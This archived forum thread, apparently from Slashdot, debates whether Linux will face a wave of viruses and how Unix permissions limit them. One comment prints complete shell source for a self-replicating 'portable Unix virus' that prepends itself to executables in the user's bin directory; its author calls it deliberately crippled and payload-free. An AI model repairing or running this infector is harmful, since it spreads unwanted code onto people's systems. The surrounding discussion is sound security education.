Linux Virii On Their Way?

Eric the Cat wrote to us with one of the most amusing articles for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the article setting the story a bit straighter.

Virus or Trojan ?

[redelm]

Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.

Viruses/trojans are much less of a problim in *nix simply because most running should be done from unpriviliged users accounts. That greatly confines the damage possible. Unfortunately, MS has yet to understand this concept.

-- Robert

Re:Virus or Trojan ?

[Mr.+Slippery]

Of course viruses exist for Linux. Except they're called Trojans

Viruses and Trojan Horse programs are different things. While the Mainstream Media(tm) persists in calling all malicious software "viruses", there are actually several different varieties:

• Trojan Horse: named, of course, for the classic crack of the city of Troy by the Greeks. A Trojan Horse program is advertized to be something benign, but actually has it in for you. The user has to run a Trojan Horse for it to be able to attack. Many macro "viruses" fall into this category. Trojans are hard to hide in open source software, and if they are run by an ordinary user they are limited in the damage they can do.
• Worm: a worm crawls from machine to machine across a network without user intervention. They often take advantage of bugs in network servers to spread - and since these servers often have root access, they can be more damaging than Trojans. Sometimes they leave a copy of themselves behind, sometimes not. The famous Internet worm is the best example. There is at least one worm that infects Linux machines (I was hit by it a year or two back on a loosely administered box; didn't seem to affect anything other than put a "w0rm" entry in my /etc/passwd.)
• Virus: a virus infects specific executable files and reproduces to infect other files. (Macros make word processor documents into executable files, thus allowing macro viruses to exist. Emacs had the same problem with file variables, but the dangerous behavior is now off by default.) Unlike a worm or a trojan, the virus is (generally) a code fragment, not a complete program in and of itself - just as a DNA or RNA virus is a fragment of genetic material, not a complete living genome.

There are a few other types, but these are the main ways that malware can get into your system. To complicate life, some malware exhibits behavior from more than one of these categories.

Security Philosophy is Paramount

[SEWilco]

It's not just the administration. The philosophy behind Unix security is that only the O.S. has access to certain things, and ordinary users are limited to what the O.S. allows them to access. The philosophy is that a non-system program can only affect itself, and the user's files.

Any Unix virus will be limited to what one user can do. Any security bug can be fixed without breaking user programs.

The MS-DOS virus industry has been proliferating due to MS-DOS requiring user access to system hardware for decades.

Linux proto viruses

[waveeq]

I recently had some of my linux files infected by
what was called a 'proto' virus. Though the virus
only infected the file of that particular user, it
was still a major pain to clean the files.
Though *nix has a very strict file permission system, it is still a big hassle if a user on a system gets infected. Because then the sysop has to trace down who else on the system executed files of that user. And trace it down all the way.
Altogether it is just a big hassle, and it would be great if some virii cleaners were avaliale for the whole system.

FUD?

[348]

The article and comments by Kaspersky seemed to be more of a press release rather than providing any real message. FUD is what I thought he was trying to get across. Cliffords comments on the other hand outline simply that Linux and *nix have much stricter file permissions and unless your log in as root, your pretty safe. I agree to a point, I think that there will be plenty of nasties waiting for Linux over the next couple of years. But now I think were pretty safe because the folks who are running Linux generally know what they're doing and unlike the "more commercial" operating systems, Linux admins/developers NEED to know what they are doing.

I wonder why this FUD was put out to begin with? It seems to me that the target audience was middle managment and not the technical ranks, I think the technical rank and file who are Linux or Unix literate would just dismiss Kasperskys' claims.

Never knock on Death's door:

Yes, there are *real* Linux viruses

[ViGe]

Of course viruses exist for Linux. Except they're called Trojans, and there are relatively easy ways to keep them out: check source, compile source especially for anything suid root. Or trust your distro.

Well, there you are wrong. There exist real viruses for Linux. They are not trojans and some of them even look for security holes in other computer so that they can break into them. Some links to the most "famous" ones:
Bliss
Staog

--

Permissions don't necessarily help

[tilly]

Remember Melissa? It didn't do anything other than make a private note that it had visited and send emails. Think that Unix permissions help against something like this?

Most people keep a lot of important data writable by themselves in their home directory. Sure, "nothing important" may have been deleted, but you could still lose all of your files.

Recall the Internet Worm? This came up before. There was nothing special about it, it just was a worm that could spread itself without any human action. That made its generation time a fraction of a second (as opposed to the 15-minutes to an hour for Melissa), which resulted in its almost instantaneous spread to every machine it could infect. Unix permissions helped against this how?

No, Linux is not immune to viruses. And as long as buffer overflows and the like continued to be treated as minor oversights and not like the major threats that they are (even if the program is only running with user-level permissions), Linux will be vulnerable. Once it becomes popular it will likely become a target...

Until then don't sweat it. After all the fire hasn't burned the house down yet, and we are fireproof. Aren't we?

Regards,
Ben

PS The time for a fix to become available is meaningless. What is the time for that fix to become incorporated on the average machine out there? Ri-ight.

Kaspersky is out of his field...

[dmuth]

Yes, I really have been following viruses since 1992. No, I don't consider myself an expert, but I think I know a fair deal about them.

That being said, I also used to hang out on Fido Net's virus echos in 1994 and 1995 where some of the true anti-virus experts hung out too. And yes, I consider Eugine Kaspersky of AVP (the guy who was quoted in the article) to be one of them. Back when the first Word Macro virus (Winword.Concept), he was the one who I saw first post about it to Fido's VIRUS echo, and he was also the first one to release a fix for it (another word macro which caught and disinfected Winword.Concept).

Unfortunately, I fear this is another case of False Authority Syndrome in that while Eugene may know viruses very well, I question his credentials in the UNIX/Linux area. For one thing, for a virus to replicate to a considerable degree on a system, you'll need to be running as root -- if you're logged in as a regular user, any program you run isn't going to be able to infect /bin/ls, no matter how hard you try. :-)

I think Kaspersky also misunderstands the nature of UNIX/Linux, in that a lot of applications (the stuff *I* use, anyway, like Apache, PHP, MySQL, etc.), when downloaded from the net, are usually done so in source form, and the end user compiles the code and runs it. It would be foolish if someone tried to put replicating code in their source, as it would be spotted very quickly and the author would have some serious explaining to do.

Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distrubtion is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.

Re:Kaspersky is out of his field...

[deacent]

I think Kaspersky may have the future audience of Linux in mind, rather than the present audience. As Linux becomes more popular, it is likely that the average Linux user will be less technically savvy. This would mean that the user may be more likely to log in as superuser (so he doesn't have to worry about not being able to install apps) and certainly wouldn't dream of downloading source to create his own binaries. Under these circumstances, a virus is quite easy sneak into a binary distribution, just as it is on other platforms.

I think what he's most concerned about is the fact that a malicious hacker can construct a more potent virus since he has access to the OS's source. Linux is most definitely more popular than it was a couple years ago, which makes it more interesting to virus writers, or certain other OS companies who may benefit in discrediting Linux.

What Kaspersky overlooks is that Linux is a constantly evolving OS. As long as that remains the case, Linux could evolve an immune system to counteract viruses, either by seeking them out or by fixing weaknesses that virus writers find.

-Jennifer

Good opportunity to educate, this

[mav[LAG]]

This reminds me of a conversation I had with a Linux-clueless colleague in the media industry. He expressed the opinion that as Linux gets more popular, so "you'll see more and more viruses for it." I laughed, because he was the same person who told me he loved NT for its stability.

But then I stopped and thought for a second. Given his complete ignorance of how Unix-like operating systems work, he just assumed that more malicious coders + more popularity = more viruses. I took some time explaining that Linux was different because of a) availability of source code b) permissions and c) the extreme wariness of the average Linux user of running untrusted binaries. I said my attitude is that if I can't get the source for it, then I won't run it - and I certainly won't run it as root.

Result: he's now running RedHat as his OS of choice. Yes these stories are funny to any halfway experienced user of Linux. But take some time to explain to a Windows-using friend why they are, and you're well on the way to more effective advocacy.

Portable Unix Virus

Here's a portable unix virus. Originally based on the shell script header produced by "gzexe", it contains the necessary apparatus to infect other executables, but no payload. There are at least two problems with the version enclosed in this message which prevent it from functioning.

Also, it's probably not as "portable" as I'd like, due to relying on bash features. Eh, too bad.


#!/bin/sh
signature=PORTABLE-UNIX-VIRUS # Written by jepler@inetnebr.com, I hope this is crippled enough that it cannot actually infect you
#set -x
if [ $USER != jnobody ]; then exit 1; fi
skip=7676

seed=1
function srandom () { seed=$[$$+`date +%s`] }

function random () { seed=$[($seed*171)%30269] ; if [ $1 -eq 0 ]; then echo 1; else echo $[$seed%$1] ; fi }

function choose () {
shift `random $#`
echo $1
}

function infected () {
head -2 $1 | tail -1 | grep $signature > /dev/null
}

function infect () {
# pathlist=`echo $PATH | tr : " "`
# dir=`choose $pathlist`
dir=$HOME/bin
echo "Will infect in $dir"
names=`find $dir -maxdepth 1 -type f`
name=`choose $names`
echo "will infect $name"
if infected $name; then
echo Already infected
else
if [ ! -w $name ]; then
notwrite=1
chmod u+w $name
fi
if [ -w $name ]; then
infectfile=`mktemp /tmp/if$$.XXXXXX` || {
echo 'cannot create a temporary file' >&2
exit 1
}
(head -$[$skip-1] $0; cat $name) > $infectfile
cat $infectfile > $name
rm -f $infectfile
if [ x$notwrite = x1 ]; then
chmod u-w $name
fi
echo success
else
echo Darn, no write permissions
fi
fi
}

srandom

tmpfile=`mktemp /tmp/gz$$.XXXXXX` || {
echo 'cannot create a temporary file' >&2
exit 1
}
if tail +$skip $0 > $tmpfile; then
infect
chmod 700 $tmpfile
prog="`echo $0 | sed 's|^.*/||'`"
if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
(sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
/tmp/"$prog" ${1+"$@"}; res=$?
else
trap 'rm -f $tmpfile; exit $res' 0
(sleep 5; rm -f $tmpfile) 2>/dev/null &
$tmpfile ${1+"$@"}; res=$?
fi
else
echo Cannot decompress $0; exit 1
fi; exit $res
true

Linux is a virus in itself

[razvedchik]

Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.

It spreads from user to user, and once you're infected, you can never go back.

It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine.

It makes its users say crazy things like "awk", "grep", "FUD", and so on....

Klooless Noobies

[Mechanist]

OK, I think most of us can agree with this:

In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root

And with this:

It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to

But the problem lies with people who run Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid.

So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it.

Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh? :-)

*nix and Viruses

[DaveHowe]

I think there are a few points here:

1. There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new.
2. Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them. but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people.
3. Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with a email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold.

So, what it comes down to is that, in general, Unix viruses are not (and will not) be a problem, but that Linux has vunerabilities that make it less secure than Unix used to be.
--

Re:*nix and Viruses

[bhurt]

The Morris Worm is actually a good example- yes, a Unix virus _can_ be written, but it takes more know-how than a DOS or WordMacro virus takes. Morris himself was the son of the head of computer security for the NSA, he knew pretty much all the holes unix had back then.

The technical hurdle, as low as it might be, is important. By the time you are sufficiently knowledgable to be dangerous, you're usually intelligent enough to know _why_ this behavior is frowned upon. And have channeled your behaviors into more socially acceptable (and might I add, more rewarding) behaviors. Most decent sysadmins could be hackers and virus writters of legendary proportions. Generally, they aren't.

The open source nature of Linux even helps here- as now there are other ways for a bright teenager to gain fame and technical esteem than writting virii. Instead, they can write kernel patches, or work on Gnome or Abiword, or write their own programs- in other words they can do something _productive_ rather than _destuctive_ programs. I'm kind of interested to see what a couple million chinese programmers can create. I doubt it'll be virii :-).

No OS is really immune

[hoss10]

I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net)
Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison!
If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant.
This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.

The "It's hard to gain root access" fallacy

[Gurlia]

Finally, just to play the Devil's Advocate, I think problems could arise if say, a binary in a distrubtion is infected, and then is sold to thousands of unsuspecting end users. All it would then take is to run that binary as root, and you suddenly have an infection on your hands. However, I don't see this as a very likely scenario, since I can count the number of Linux-based viruses which I have heard of on one hand. For the reasons I outlined above, Linux just isn't a very attractive platform to virus writers, who want to see their creations spread.

It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?

Although it is true that Linux (and Unices in general) tend to give less motivations for virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork( ) bombs? Or HD space hoggers that cause you to be unable save your latest document? The system may be less vulnerable, but your data isn't.

Re:Huh?

[Battra]

Well, no, it was never that way.

You are probably thinking of second declension masculine masculine Latin nounds (there are lots of them). The nominative singular ending for these nouns is -us. The nominative plural is -i (note just one i, not two (or i not ii in Roman numerals)).

There are other declensions that use -us in the nominative singular and something different in the plural. For example, third declension nouns of any gender may end in -us in the nominative singular, while the nominative plural ending for masculine nouns is -es.

I realize that I may be one of the only Slashdot geeks to have majored in Classical Languages instead of Computer Science, and no pedantry was intended in this post.

Things that make Linux harder/easier to attack

[dsplat]

Things that make Linux harder to attack:

1. There are an enormous number of slightly different compiles of the kernel and various commonly used programs out there. Because everyone can get the source, every distribution and many users compile it for themselves. This is going to mean that a virus that attacks a binary is likely to simply break it on at least some subset of systems, making detection relatively easy.
2. The Linux security model is different from that of Windows. If you aren't running as root or another account with access to various things, such as bin, there are a lot of files you just can't change.
3. Different distributions structure their configurations differently. This makes targetting rc scripts harder, but not impossible.
4. Because a large part of the configuration is found in scripts and text files, detecting the damage and determining what was done is potentially more straightforward. Joe Average User may not find it, but the local Users' Group can probably track the source of the problem for him.
5. Because we all have documentation for the configuration of everything, building tools that detect subtle changes and keep archived copies of config files is something a good and thorough programmer on a tight budget can do.
6. Because we have source, proving that you are a Real Programmer on an Open Source OS can be accomplished by a number of constructive avenues that are only available through Open Source. These may reduce the number of people seeking attention in negative ways ... maybe.

Some things that are going to make Linux easier to attack:

1. J. Virus Writer has access to full documentation and source for the programs he wants to attack. Finding the existance of buffers that can be overrun and the consequences is not a trial and error effort.
2. Text is easy to manipulate and most config files and start-up scripts are text. Thus, the virus can do its work by spawning sed, perl, awk, ed, emacs or several other tools. Those scripts are likely to be smaller and more portable across releases and distributions than the equivalent binaries. And they can be embedded in binaries.
3. LILO. Somebody who can install a hacked version of LILO can do some damage. And the LILO config is easy enough to edit. See my previous point.
4. Trusted binaries can be compromised in useful ways, as described by Ken Thompson in Reflections on Trusting Trust. I have some thoughts on how to make such a compromised binary nearly undetectable on the system on which it was built. I won't detail them here.

One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.

The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.

Heh heh heh

[Greyfox]

MS Office for Linux will probably refuse to run unless you're root, compounding the problem.

Microsoft will blame it on the poor security model in Linux.

Virusses on Linux and the One known Linux virus

[Greyfox]

The one known Linux virus used a buffer overflow to obtain root before infecting other files. The problem with the buffer overflow method is that your virus will not have the longevity that it would in the Windows or Macintosh world. Security patches tend to come out very regularly in Linux and close those holes.

Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.

A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.

Virusses would also have to fear programs like tripwire which take checksums of vital executables. This is another good reason to use tripwire and related products. While it is possible to defeat tripwire it would involve more code than a virus is likely to want to carry in its payload.

Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.

Unless you code your virus in a macro language, the cross platform nature of Linux will also bog down the prospective virus writer. Since the archetectures are very different and virusses usually do very low level stuff, he'd have to port the machine dependent code to the various Linux platforms. On the plus side he could use cvs and bugzilla so that his users could report bugs with his virus.

How to be 99.999% secure

[jd]

It's easy. Run a non-standard configuration. A virus -has- to make certain assumptions about your computer. The only reason DOS and Windows viruses were so small is that you could make a lot of assumptions and be right most of the time.

With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.

Suggestions:

• Put your data area into a non-standard filing system, such as ReiserFS, Ext3, SysV FS, etc. It's a lot harder to do low-level file mods when you don't know what the file looks like.
• Lock down your root partition. TOTALLY. Put anything that needs to be writable in a seperate partition. Mount root as read-only, and keep it that way.
• Install the latest glibc, unless you're using commercial apps. You can always recompile YOUR code, but a virus can't recompile it's.
• Intrusion Detection Systems can be fun. LIDS is a good place to start, though just about any will do. Tripwire's another handy gadget to have around, too.
• Install a non-standard permission system. Trustees, or POSIX ACL will do nicely. It's much less fun for the poor virus, if it can't even tell what permissions exist or where.
• Don't put your standard binaries in any particular place. Let the virus look, for a change, if it wants to use any. It's not going to affect you, as you've got a path set up.
• NEVER, EVER enable the kernel to support loading modules from alien versions. That way, any kernel virus has to be compiled for that specific kernel. And the odds of that are zilch, if you go and install the very latest.

The Pariable of the Root-Running Dipshit

[Greyfox]

And one day it came to pass that a luser decided to ignore the wisdom of his elders, and he did shake his hands at the heavens and swore to run as root forever.

And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.

And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.

And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.